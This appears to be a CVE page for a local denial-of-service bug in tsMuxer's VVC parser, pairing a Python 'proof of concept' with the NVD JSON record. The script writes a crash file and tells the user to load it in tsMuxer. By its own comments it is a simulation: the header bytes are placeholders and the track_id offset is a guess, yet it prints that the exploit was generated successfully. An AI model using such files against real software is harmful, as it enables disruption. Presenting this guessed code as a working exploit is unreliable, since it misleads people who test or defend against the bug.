CVE-2026-7740

# PoC for CVE-2026-7740 # Conceptual PoC demonstrating the trigger condition import struct def generate_exploit_file(filename): """ Generates a crafted file that triggers the VvcVpsUnit::setFPS vulnerability. The exploit manipulates the track_id argument to cause a DoS. """ # This is a simulated VVC VPS structure with a malicious track_id # Real implementation would require reverse engineering the exact binary format. # Header for a VVC NAL unit (simulation) # forbidden_zero_bit(1) + nuh_layer_id(6) + nuh_temporal_id_plus1(3) nal_header = bytes([0x00, 0x01, 0x02]) # VPS data placeholder vps_data = b'\x00' * 10 # The vulnerability is triggered by 'track_id'. # Assuming track_id is parsed as an integer at this offset. # Sending an unexpected large value or specific pattern to trigger the bug. # Based on typical DoS in C++, this might be an out-of-bounds index. malicious_track_id = struct.pack('<I', 0xFFFFFFFF) payload = nal_header + vps_data + malicious_track_id with open(filename, 'wb') as f: f.write(payload) print(f"[+] Exploit file '{filename}' generated successfully.") print(f"[+] Load this file in tsMuxer to trigger the Denial of Service.") if __name__ == "__main__": generate_exploit_file("cve_2026_7740_poc.bin")

{"cve": {"id": "CVE-2026-7740", "sourceIdentifier": "[email protected]", "published": "2026-05-04T07:16:02.257", "lastModified": "2026-05-04T15:17:58.710", "vulnStatus": "Deferred", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in justdan96 tsMuxer up to 2.7.0. This issue affects the function VvcVpsUnit::setFPS of the file tsMuxer/vvc.cpp. Such manipulation of the argument track_id leads to denial of service. An attack has to be approached locally. The exploit has been disclosed publicly and may be used. This vulnerability only affects products that are no longer supported by the maintainer."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-404"}]}], "references": [{"url": "https://github.com/justdan96/tsMuxer/", "source": "[email protected]"}, {"url": "https://github.com/justdan96/tsMuxer/issues/899", "source": "[email protected]"}, {"url": "https://github.com/user-attachments/files/16812319/poc5.zip", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/807651", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/360915", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/360915/cti", "source": "[email protected]"}]}}